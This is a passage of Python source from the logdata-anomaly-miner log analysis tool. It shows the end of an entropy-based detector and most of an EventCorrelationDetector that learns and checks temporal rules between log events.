                listener.receive_event(f"Analysis.{self.__class__.__name__}", "Value entropy anomaly detected", sorted_log_lines, event_data, log_atom, self)
    # Extend frequency table if learn mode is active.
    if self.learn_mode is True:
        for value in values:
            if self.skip_repetitions is True:
                # Do not consider repeating values multiple times for extending frequency table to avoid distortions.
                if value in self.value_set:
                    continue
                self.value_set.add(value)
            # Same pair enumeration as in the scoring loop above, including the -1 start/end markers.
            for i in range(-1, len(value)):
                first_char = -1
                if i != -1:
                    first_char = value[i]
                second_char = -1
                if i != len(value) - 1:
                    second_char = value[i + 1]
                if first_char in self.freq:
                    self.total_freq[first_char] += 1
                    if second_char in self.freq[first_char]:
                        self.freq[first_char][second_char] += 1
                    else:
                        self.freq[first_char][second_char] = 1
                else:
                    self.total_freq[first_char] = 1
                    self.freq[first_char] = {}
                    self.freq[first_char][second_char] = 1
        # Every learned atom pushes the "no anomaly" learning deadline forward again.
        if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None:
            self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time
    self.log_success += 1
    return True


def do_timer(self, trigger_time):
    """Check if current ruleset should be persisted.

    @param trigger_time the time the timer fired with.
    @return the delay until the next call: the remaining time until next_persist_time, or a full persistence period
    after data has just been persisted.
    NOTE(review): when next_persist_time is None only the period is returned and next_persist_time is not set here;
    presumably it is initialised elsewhere (not visible in this chunk) — otherwise the timer never persists.
    """
    if self.next_persist_time is None:
        return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
    delta = self.next_persist_time - trigger_time
    if delta <= 0:
        self.do_persist()
        delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        self.next_persist_time = trigger_time + delta
    return delta


def do_persist(self) -> None:
    """Immediately write persistence data to storage.

    The nested frequency table is flattened into the JSON-friendly list form
    [[first_char, [[second_char, frequency], ...]], ...] that load_persistence_data() reads back.
    """
    lst = []
    for first_char, second_char_elem in self.freq.items():
        sublst = []
        for second_char, frequency in second_char_elem.items():
            sublst.append([second_char, frequency])
        lst.append([first_char, sublst])
    PersistenceUtil.store_json(self.persistence_file_name, lst)
    logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)


def load_persistence_data(self) -> None:
    """Load the persistence data from storage.

    Persisted counts are added onto whatever is already in self.freq (e.g. the built-in default table); afterwards
    self.total_freq is recomputed for every first_char as the sum of its second_char counts.
    NOTE(review): the persisted structure is consumed as-is. A corrupted or hand-edited persistence file with an
    unexpected shape or non-numeric counts raises (IndexError/TypeError) here instead of being rejected, so the
    integrity of the persistence directory matters for detector start-up.
    """
    persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
    if persistence_data is not None:
        for elem in persistence_data:
            first_char = elem[0]
            second_char_list = elem[1]
            if first_char not in self.freq:
                self.freq[first_char] = {}
            for second_char_elem in second_char_list:
                second_char = second_char_elem[0]
                frequency = second_char_elem[1]
                if second_char not in self.freq[first_char]:
                    self.freq[first_char][second_char] = 0
                self.freq[first_char][second_char] += frequency
    # Recompute the per-first_char totals for every key in self.freq; receive_atom() divides by these.
    for first_char, second_char_dict in self.freq.items():
        self.total_freq[first_char] = sum(second_char_dict.values())


def allowlist_event(self, event_type, event_data, allowlisting_data) -> str:
    """Allowlist an event generated by this source using the information emitted when generating the event.

    Allowlisting here means adding event_data as a path to constraint_list, i.e. only atoms containing that path are
    analysed from now on; no extra allowlisting_data is understood.
    @return a message with information about allowlisting
    @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
    """
    if event_type != f"Analysis.{self.__class__.__name__}":
        msg = "Event not from this source"
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)
    if allowlisting_data is not None:
        msg = "Allowlisting data not understood by this detector"
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)
    if event_data not in self.constraint_list:
        self.constraint_list.append(event_data)
    return f"Allowlisted path {event_data} in {event_type}."


def blocklist_event(self, event_type, event_data, blocklisting_data) -> str:
    """Blocklist an event generated by this source using the information emitted when generating the event.

    Blocklisting here means adding event_data as a path to ignore_list, i.e. atoms containing that path are skipped
    from now on; no extra blocklisting_data is understood.
    @return a message with information about blocklisting
    @throws Exception when blocklisting of this special event using given blocklisting_data was not possible.
    """
    if event_type != f"Analysis.{self.__class__.__name__}":
        msg = "Event not from this source"
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)
    if blocklisting_data is not None:
        msg = "Blocklisting data not understood by this detector"
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise Exception(msg)
    if event_data not in self.ignore_list:
        self.ignore_list.append(event_data)
    return f"Blocklisted path {event_data} in {event_type}."


def log_statistics(self, component_name) -> None:
    """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

    @param component_name the name of the component which is printed in the log line.
    """
    # Both statistic levels currently emit the same line; the counters are reset afterwards regardless of level.
    if AminerConfig.STAT_LEVEL == 1:
        logging.getLogger(STAT_LOG_NAME).info("'%s' processed %d out of %d log atoms successfully in the last 60 minutes.",
                                              component_name, self.log_success, self.log_total)
    elif AminerConfig.STAT_LEVEL == 2:
        logging.getLogger(STAT_LOG_NAME).info("'%s' processed %d out of %d log atoms successfully in the last 60 minutes.",
                                              component_name, self.log_success, self.log_total)
    self.log_success = 0
    self.log_total = 0
EventCorrelationDetector.py000066400000000000000000001501131500476301700362770ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis
"""This module defines an evaluator and generator for event rules.

The overall idea of generation is
1) For each processed event A, randomly select another event B occurring within queue_delta_time.
2) If B chronologically occurs after A, create the hypothesis A => B (observing event A implies that event B must be
   observed within current_time+queue_delta_time). If B chronologically occurs before A, create the hypothesis B <= A
   (observing event A implies that event B must be observed within current_time-queue_delta_time).
3) Observe for a long time (max_observations) whether the hypothesis holds.
4) If the hypothesis holds, transform it to a rule.
Otherwise, discard the hypothesis.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public
License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later
version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .
"""

from collections import deque
import random
import math
import logging

from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \
    STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX
from aminer import AminerConfig
from aminer.AnalysisChild import AnalysisContext
from aminer.events.EventInterfaces import EventSourceInterface
from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface
from aminer.util import PersistenceUtil
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class EventCorrelationDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface):
    """This class tries to find time correlation patterns between different log atom events."""

    # Timer callbacks (do_timer) are driven by wall-clock time rather than by log atom timestamps.
    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, max_hypotheses=1000, hypothesis_max_delta_time=5.0,
                 generation_probability=1.0, generation_factor=1.0, max_observations=500, p0=0.9, alpha=0.05, candidates_size=10,
                 hypotheses_eval_delta_time=120.0, delta_time_to_discard_hypothesis=180.0, check_rules_flag=False, learn_mode=True,
                 ignore_list=None, persistence_id="Default", output_logline=True, constraint_list=None, stop_learning_time=None,
                 stop_learning_no_anomaly_time=None, log_resource_ignore_list=None):
        """Initialize the detector. This will also trigger reading or creation of persistence storage location.

        @param aminer_config configuration from analysis_context.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths
               are considered for value range generation.
        @param max_hypotheses maximum amount of hypotheses and rules hold in memory.
        @param hypothesis_max_delta_time time span of events considered for hypothesis generation.
        @param generation_probability probability in [0, 1] that currently processed log line is considered for hypothesis with each
               of the candidates.
        @param generation_factor likelihood in [0, 1] that currently processed log line is added to the set of candidates for
               hypothesis generation.
        @param max_observations maximum amount of evaluations before hypothesis is transformed into a rule or discarded or rule is
               evaluated. Also the argument of math.factorial() in get_min_eval_true(), so very large values are expensive.
        @param p0 expected value for hypothesis evaluation distribution.
        @param alpha confidence value for hypothesis evaluation.
        @param candidates_size maximum number of stored candidates used for hypothesis generation.
        @param hypotheses_eval_delta_time duration between hypothesis evaluation phases that remove old hypotheses that are likely
               to remain unused.
        @param delta_time_to_discard_hypothesis time span required for old hypotheses to be discarded.
        @param check_rules_flag specifies whether existing rules are evaluated.
        @param learn_mode specifies whether new hypotheses are generated.
        @param ignore_list list of paths that are not considered for correlation, i.e., events that contain one of these paths are
               omitted. The default value is [] as None is not iterable.
        @param persistence_id name of persistence file.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param constraint_list list of paths that have to be present in the log atom to be analyzed.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        @param log_resource_ignore_list list of log resources to ignore; only passed through to the base class here, its
               handling is not visible in this method.
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5
        self.stop_learning_time_initialized = None
        # The base class stores every keyword below as an instance attribute; the names listed in mutable_default_args get a
        # fresh empty list when None is passed (hence the "[] as None is not iterable" remark above).
        super().__init__(
            mutable_default_args=["target_path_list", "ignore_list", "constraint_list", "log_resource_ignore_list"],
            aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list,
            max_hypotheses=max_hypotheses, hypothesis_max_delta_time=hypothesis_max_delta_time,
            generation_probability=generation_probability, generation_factor=generation_factor, max_observations=max_observations,
            p0=p0, alpha=alpha, candidates_size=candidates_size, hypotheses_eval_delta_time=hypotheses_eval_delta_time,
            delta_time_to_discard_hypothesis=delta_time_to_discard_hypothesis, check_rules_flag=check_rules_flag, learn_mode=learn_mode,
            ignore_list=ignore_list, persistence_id=persistence_id, output_logline=output_logline, constraint_list=constraint_list,
            stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time,
            log_resource_ignore_list=log_resource_ignore_list
        )
        self.last_unhandled_match = None
        self.total_records = 0
        # Hypotheses and rules are kept in forward (A => B) and back (B <= A) variants plus inverted lookups;
        # their exact key/value layout is defined by the methods that fill them, outside this chunk.
        self.forward_hypotheses = {}
        self.back_hypotheses = {}
        self.forward_hypotheses_inv = {}
        self.back_hypotheses_inv = {}
        self.last_hypotheses_eval_timestamp = -1.0
        self.forward_rule_queue = deque([])
        self.back_rule_queue = deque([])
        self.forward_hypotheses_queue = deque([])
        self.back_hypotheses_queue = deque([])
        self.hypothesis_candidates = deque([])
        self.sum_unstable_unknown_hypotheses = 0
        self.last_event_occurrence = {}
        # Memo cache for get_min_eval_true(); must exist before the call below, which reads it.
        self.min_eval_true_dict = {}
        self.min_eval_true_dict_max_size = 1000
        self.sample_events = {}
        self.back_rules = {}
        self.forward_rules = {}
        self.back_rules_inv = {}
        self.forward_rules_inv = {}
        # Compute the initial minimum amount of positive evaluations for hypotheses to become rules.
        # For rules, this value can be different and will be computed based on the sample observations.
        self.min_eval_true = self.get_min_eval_true(self.max_observations, self.p0, self.alpha)
        self.log_forward_rules_learned = 0
        self.log_back_rules_learned = 0
        self.log_new_forward_rules = []
        self.log_new_back_rules = []
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        self.load_persistence_data()

    def get_min_eval_true(self, max_observations, p0, alpha):
        """Compute the critical value (minimal amount of true evaluations) for a hypothesis.

        The form of the hypothesis is A implies B with at least probability p0 to be accepted.
        This method tries to be efficient by
        - Storing already computed critical values in a dictionary
        - Swapping (1 - p0) and p0 and replace alpha with (1 - alpha) to reduce loops
        (The remainder of this method lies beyond this chunk.)
        """
        if (max_observations, p0, alpha) in self.min_eval_true_dict:
            return self.min_eval_true_dict[(max_observations, p0, alpha)]
        sum1 = 0.0
        # Exact integer factorial of a configuration-controlled value; cost grows quickly with max_observations.
        max_observations_factorial = math.factorial(max_observations)
        i_factorial = 1
        for i in range(max_observations + 1):
            i_factorial = i_factorial * max(i, 1)
            # No float conversion possible for huge numbers; use integer division.
sum1 = sum1 + max_observations_factorial / (i_factorial * math.factorial(max_observations - i)) * ((1 - p0) ** i) * ( p0 ** (max_observations - i)) if sum1 > (1 - alpha): if len(self.min_eval_true_dict) <= self.min_eval_true_dict_max_size: # Store common values for fast retrieval self.min_eval_true_dict[(max_observations, p0, alpha)] = max_observations - i return max_observations - i return max_observations def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False parser_match = log_atom.parser_match self.total_records += 1 # Skip paths from ignore_list. for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary(): return False if self.target_path_list is None or len(self.target_path_list) == 0: # Event is defined by the full path of log atom. 
constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return False log_event = tuple(parser_match.get_match_dictionary()) else: # Event is defined by value combos in target_path_list values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) if value is not None: all_values_none = False values.append(value) if all_values_none is True: return False log_event = tuple(values) # Store last seen sample event to improve output. self.sample_events[log_event] = log_atom.raw_data if self.check_rules_flag: # Only check rules without generating new hypotheses. # Trigger implication A => B when A occurs. if log_event in self.forward_rules: for rule in self.forward_rules[log_event]: rule.rule_trigger_timestamps.append(log_atom.atom_time) self.forward_rule_queue.append(rule) # Resolve triggered implication A => B when B occurs. if log_event in self.forward_rules_inv: for rule in self.forward_rules_inv[log_event]: # Find first non-observed trigger timestamp trigger_timestamp_index = -1 for trigger_timestamp in rule.rule_trigger_timestamps: trigger_timestamp_index += 1 if trigger_timestamp != "obs": break if trigger_timestamp_index != -1 and \ rule.rule_trigger_timestamps[trigger_timestamp_index] != "obs" and \ rule.rule_trigger_timestamps[trigger_timestamp_index] >= log_atom.atom_time - self.hypothesis_max_delta_time: # Implication was triggered; append positive evaluation and mark as seen. 
rule.add_rule_observation(1) rule.rule_trigger_timestamps[trigger_timestamp_index] = "obs" # Clean up triggered/resolved implications. while len(self.forward_rule_queue) > 0: rule = self.forward_rule_queue[0] if len(rule.rule_trigger_timestamps) == 0: # Triggered timestamp was already deleted somewhere else. self.forward_rule_queue.popleft() continue if rule.rule_trigger_timestamps[0] == "obs": # Remove triggered timestamp. rule.rule_trigger_timestamps.popleft() self.forward_rule_queue.popleft() continue if rule.rule_trigger_timestamps[0] < log_atom.atom_time - self.hypothesis_max_delta_time: # Too much time has elapsed; append negative evaluation. rule.add_rule_observation(0) rule.rule_trigger_timestamps.popleft() self.forward_rule_queue.popleft() if not rule.evaluate_rule(): if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) tmp_string = f"Rule: {str(rule.trigger_event)} -> {str(rule.implied_event)}\n Expected: " \ f"{str(rule.min_eval_true)}/{str(rule.max_observations)}\n Observed: " \ f"{str(sum(rule.rule_observations))}/{str(len(rule.rule_observations))}" if self.output_logline: sorted_log_lines = [tmp_string + "\n" + original_log_line_prefix + data] else: sorted_log_lines = [tmp_string + data] for listener in self.anomaly_event_handlers: implied_event = None trigger_event = None if rule.implied_event in self.sample_events: implied_event = self.sample_events[rule.implied_event] if rule.trigger_event in self.sample_events: trigger_event = self.sample_events[rule.trigger_event] listener.receive_event( "analysis.EventCorrelationDetector", f"Correlation rule violated! 
Event {repr(implied_event)} is missing, but should follow event " f"{repr(trigger_event)}", sorted_log_lines, {"RuleInfo": {"Rule": str(rule.trigger_event) + "->" + str(rule.implied_event), "Expected": str(rule.min_eval_true) + "/" + str(rule.max_observations), "Observed": str(sum(rule.rule_observations)) + "/" + str(len(rule.rule_observations))}}, log_atom, self) rule.rule_observations = deque([]) continue break # Trigger implication B <= A when B occurs. if log_event in self.back_rules_inv: for rule in self.back_rules_inv[log_event]: rule.rule_trigger_timestamps.append(log_atom.atom_time) self.back_rule_queue.append(rule) # Resolve triggered implication B <= A when A occurs. if log_event in self.back_rules: for rule in self.back_rules[log_event]: # Find first non-observed trigger timestamp trigger_timestamp_index = -1 for trigger_timestamp in rule.rule_trigger_timestamps: trigger_timestamp_index += 1 if trigger_timestamp != "obs": break if trigger_timestamp_index != -1 and \ rule.rule_trigger_timestamps[trigger_timestamp_index] != "obs" and \ rule.rule_trigger_timestamps[trigger_timestamp_index] >= log_atom.atom_time - self.hypothesis_max_delta_time: rule.add_rule_observation(1) rule.rule_trigger_timestamps[trigger_timestamp_index] = "obs" else: rule.add_rule_observation(0) if not rule.evaluate_rule(): if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max( self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) tmp_string = f"Rule: {str(rule.implied_event)} <- {str(rule.trigger_event)}\n Expected: " \ f"{str(rule.min_eval_true)}/{str(rule.max_observations)}\n Observed: " \ 
f"{str(sum(rule.rule_observations))}/{str(len(rule.rule_observations))}" if self.output_logline: sorted_log_lines = [tmp_string + "\n" + original_log_line_prefix + data] else: sorted_log_lines = [tmp_string + data] for listener in self.anomaly_event_handlers: implied_event = None trigger_event = None if rule.implied_event in self.sample_events: implied_event = self.sample_events[rule.implied_event] if rule.trigger_event in self.sample_events: trigger_event = self.sample_events[rule.trigger_event] listener.receive_event( "analysis.EventCorrelationDetector", f"Correlation rule violated! Event {repr(implied_event)} is missing, but should precede event " f"{repr(trigger_event)}", sorted_log_lines, {"RuleInfo": {"Rule": str(rule.implied_event) + "<-" + str(rule.trigger_event), "Expected": str(rule.min_eval_true) + "/" + str(rule.max_observations), "Observed": str(sum(rule.rule_observations)) + "/" + str(len(rule.rule_observations))}}, log_atom, self) rule.rule_observations = deque([]) # Clean up triggered/resolved implications. while len(self.back_rule_queue) > 0: rule = self.back_rule_queue[0] if len(rule.rule_trigger_timestamps) == 0: self.back_rule_queue.popleft() continue if rule.rule_trigger_timestamps[0] == "obs": rule.rule_trigger_timestamps.popleft() self.back_rule_queue.popleft() continue if rule.rule_trigger_timestamps[0] < log_atom.atom_time - self.hypothesis_max_delta_time: rule.rule_trigger_timestamps.popleft() self.back_rule_queue.popleft() continue break if self.learn_mode: # Generate new hypotheses and rules. # Keep track of event occurrences, relevant for removing old hypotheses. self.last_event_occurrence[log_event] = log_atom.atom_time # Trigger implication A => B when A occurs. 
if log_event in self.forward_hypotheses: for implication in self.forward_hypotheses[log_event]: if implication.stable == 0: implication.hypothesis_trigger_timestamps.append(log_atom.atom_time) self.forward_hypotheses_queue.append(implication) # Resolve triggered implication A => B when B occurs. if log_event in self.forward_hypotheses_inv: delete_hypotheses = [] for implication in self.forward_hypotheses_inv[log_event]: # Find first non-observed trigger timestamp trigger_timestamp_index = -1 for trigger_timestamp in implication.hypothesis_trigger_timestamps: trigger_timestamp_index += 1 if trigger_timestamp != "obs": break if trigger_timestamp_index != -1 and \ str(implication.hypothesis_trigger_timestamps[trigger_timestamp_index]) != "obs" and \ implication.hypothesis_trigger_timestamps[trigger_timestamp_index] >= log_atom.atom_time - \ self.hypothesis_max_delta_time and \ implication.stable == 0: implication.add_hypothesis_observation(1, log_atom.atom_time) # Mark this timestamp as observed implication.hypothesis_trigger_timestamps[trigger_timestamp_index] = "obs" # Since only true observations occur here, check for instability not necessary. if implication.compute_hypothesis_stability() == 1: # Update p and min_eval_true according to the results in the sample. p = implication.hypothesis_evaluated_true / implication.hypothesis_observations implication.min_eval_true = self.get_min_eval_true(self.max_observations, p, self.alpha) # Add hypothesis to rules. 
if implication.trigger_event in self.forward_rules: self.forward_rules[implication.trigger_event].append(implication) self.log_forward_rules_learned += 1 self.log_new_forward_rules.append(implication) else: self.forward_rules[implication.trigger_event] = [implication] self.log_forward_rules_learned += 1 self.log_new_forward_rules.append(implication) if implication.implied_event in self.forward_rules_inv: self.forward_rules_inv[implication.implied_event].append(implication) else: self.forward_rules_inv[implication.implied_event] = [implication] # Drop time stamps of previous observations, start new observations for rule. implication.hypothesis_trigger_timestamps.clear() self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 # Remove implication from list of hypotheses. self.forward_hypotheses[implication.trigger_event].remove(implication) delete_hypotheses.append(implication) for delete_hypothesis in delete_hypotheses: self.forward_hypotheses_inv[log_event].remove(delete_hypothesis) # Clean up triggered/resolved implications. while len(self.forward_hypotheses_queue) > 0: implication = self.forward_hypotheses_queue[0] if len(implication.hypothesis_trigger_timestamps) == 0: # Triggered timestamp was already deleted somewhere else. self.forward_hypotheses_queue.popleft() continue if implication.hypothesis_trigger_timestamps[0] == "obs": # Remove triggered timestamp. implication.hypothesis_trigger_timestamps.popleft() self.forward_hypotheses_queue.popleft() continue if implication.hypothesis_trigger_timestamps[0] < log_atom.atom_time - self.hypothesis_max_delta_time: # Too much time has elapsed; append negative evaluation. 
implication.hypothesis_trigger_timestamps.popleft() implication.add_hypothesis_observation(0, log_atom.atom_time) if implication.compute_hypothesis_stability() == -1 and implication.trigger_event in self.forward_hypotheses and \ implication in self.forward_hypotheses[implication.trigger_event]: # This check is required if a hypothesis was already removed, but triggered hypotheses are still in the queue. self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 self.forward_hypotheses[implication.trigger_event].remove(implication) self.forward_hypotheses_inv[implication.implied_event].remove(implication) if len(self.forward_hypotheses[implication.trigger_event]) == 0: del self.forward_hypotheses[implication.trigger_event] if len(self.forward_hypotheses_inv[implication.implied_event]) == 0: del self.forward_hypotheses_inv[implication.implied_event] self.forward_hypotheses_queue.popleft() continue break # Trigger implication B <= A when B occurs. if log_event in self.back_hypotheses_inv: for implication in self.back_hypotheses_inv[log_event]: if implication.stable == 0: implication.hypothesis_trigger_timestamps.append(log_atom.atom_time) self.back_hypotheses_queue.append(implication) # Resolve triggered implication B <= A when A occurs. 
if log_event in self.back_hypotheses: delete_hypotheses = [] for implication in self.back_hypotheses[log_event]: if implication.stable == 0: # Find first non-observed trigger timestamp trigger_timestamp_index = -1 for trigger_timestamp in implication.hypothesis_trigger_timestamps: trigger_timestamp_index += 1 if trigger_timestamp != "obs": break if trigger_timestamp_index != -1 and \ str(implication.hypothesis_trigger_timestamps[trigger_timestamp_index]) != "obs" and \ implication.hypothesis_trigger_timestamps[trigger_timestamp_index] >= log_atom.atom_time - \ self.hypothesis_max_delta_time: implication.add_hypothesis_observation(1, log_atom.atom_time) implication.hypothesis_trigger_timestamps[trigger_timestamp_index] = "obs" # Since only true observations occur here, check for instability not necessary. if implication.compute_hypothesis_stability() == 1: # Update p and min_eval_true according to the results in the sample. p = implication.hypothesis_evaluated_true / implication.hypothesis_observations implication.min_eval_true = self.get_min_eval_true(self.max_observations, p, self.alpha) # Add hypothesis to rules. if implication.trigger_event in self.back_rules: self.back_rules[implication.trigger_event].append(implication) self.log_back_rules_learned += 1 self.log_new_back_rules.append(implication) else: self.back_rules[implication.trigger_event] = [implication] self.log_back_rules_learned += 1 self.log_new_back_rules.append(implication) if implication.implied_event in self.back_rules_inv: self.back_rules_inv[implication.implied_event].append(implication) else: self.back_rules_inv[implication.implied_event] = [implication] # Drop time stamps of previous observations, start new observations for rule. implication.hypothesis_trigger_timestamps.clear() self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 # Remove implication from list of hypotheses. 
delete_hypotheses.append(implication) self.back_hypotheses_inv[implication.implied_event].remove(implication) else: implication.add_hypothesis_observation(0, log_atom.atom_time) if implication.compute_hypothesis_stability() == -1: self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 delete_hypotheses.append(implication) self.back_hypotheses_inv[implication.implied_event].remove(implication) if len(self.back_hypotheses_inv[implication.implied_event]) == 0: del self.back_hypotheses_inv[implication.implied_event] for delete_hypothesis in delete_hypotheses: self.back_hypotheses[log_event].remove(delete_hypothesis) if len(self.back_hypotheses[log_event]) == 0: del self.back_hypotheses[log_event] # Clean up triggered/resolved implications. while len(self.back_hypotheses_queue) > 0: implication = self.back_hypotheses_queue[0] if len(implication.hypothesis_trigger_timestamps) == 0: self.back_hypotheses_queue.popleft() continue if implication.hypothesis_trigger_timestamps[0] == "obs": implication.hypothesis_trigger_timestamps.popleft() self.back_hypotheses_queue.popleft() continue if implication.hypothesis_trigger_timestamps[0] < log_atom.atom_time - self.hypothesis_max_delta_time: implication.hypothesis_trigger_timestamps.popleft() self.back_hypotheses_queue.popleft() continue break # Generate new hypotheses if len(self.hypothesis_candidates) > 0 and random.uniform(0.0, 1.0) < self.generation_factor: # nosec B311 implication_direction = random.randint(0, 1) # nosec B311 if self.sum_unstable_unknown_hypotheses >= self.max_hypotheses: # If too many hypotheses exist, do nothing. 
implication_direction = -1 if implication_direction == 0: for candidate in self.hypothesis_candidates: candidate_event = candidate[0] # Chronological implication is: candidate_event <= log_event implication = Implication(log_event, candidate_event, log_atom.atom_time, self.max_observations, self.min_eval_true) if log_event in self.back_hypotheses: # Only add hypotheses that are not already present as hypotheses. continue_outer = False for imp in self.back_hypotheses[log_event]: if candidate_event == imp.implied_event: continue_outer = True break if continue_outer: continue if log_event in self.back_rules: # Only add hypotheses that are not already present as rules. continue_outer = False for imp in self.back_rules[log_event]: if candidate_event == imp.implied_event: continue_outer = True break if continue_outer: continue # At this point it is known that the implication is new, otherwise a continue statement would have been reached if log_event in self.back_hypotheses: self.back_hypotheses[log_event].append(implication) else: self.back_hypotheses[log_event] = [implication] if candidate_event in self.back_hypotheses_inv: self.back_hypotheses_inv[candidate_event].append(implication) else: self.back_hypotheses_inv[candidate_event] = [implication] self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses + 1 elif implication_direction == 1: for candidate in self.hypothesis_candidates: candidate_event = candidate[0] # Chronological implication is: candidate_event => log_event # Skip event A => event A since already covered by back hypotheses if log_event != candidate_event: implication = Implication(candidate_event, log_event, log_atom.atom_time, self.max_observations, self.min_eval_true) if candidate_event in self.forward_hypotheses: # Only add hypotheses that are not already present as hypotheses. 
continue_outer = False for imp in self.forward_hypotheses[candidate_event]: if log_event == imp.implied_event: continue_outer = True break if continue_outer: continue if candidate_event in self.forward_rules: # Only add hypotheses that are not already present as rules. continue_outer = False for imp in self.forward_rules[candidate_event]: if log_event == imp.implied_event: continue_outer = True break if continue_outer: continue # At this point it is known that the implication is new, otherwise a continue statement would have been reached if candidate_event in self.forward_hypotheses: self.forward_hypotheses[candidate_event].append(implication) else: self.forward_hypotheses[candidate_event] = [implication] if log_event in self.forward_hypotheses_inv: self.forward_hypotheses_inv[log_event].append(implication) else: self.forward_hypotheses_inv[log_event] = [implication] self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses + 1 if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) # Periodically remove old or unstable hypotheses. 
